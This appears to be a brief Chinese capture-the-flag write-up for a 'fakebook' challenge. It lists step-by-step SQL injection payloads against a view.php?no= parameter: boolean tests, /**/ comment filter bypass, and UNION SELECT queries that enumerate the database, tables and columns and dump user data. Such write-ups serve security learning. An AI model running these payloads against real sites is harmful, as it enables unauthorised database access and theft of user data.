打开题目,就一个登陆页面,来回看了看也没啥
注册了个账号,进去之后,查看了下源代码,发现了一个view.php?no=1
应该是存在注入点,
view.php?no=1 and 1=1# 正常
view.php?no=1 and 1=2# 报错 则存在注入点
view.php?no= union/**/select 1,2,3,4# //由于过滤了很多,只能用/**/绕过
只有2有回显,我们进行利用
view.php?no=2 union/**/select 1,database(),3,4#
view.php?no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#
view.php?no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#
view.php?no=2 union/**/select 1,group_concat(data),3,4 from fakebook.users#
按照顺序一步步来,得到
通过伪造最后字段获取flag
查看一下源代码
点击data获取到flag
菜狗一枚,欢迎交流学习。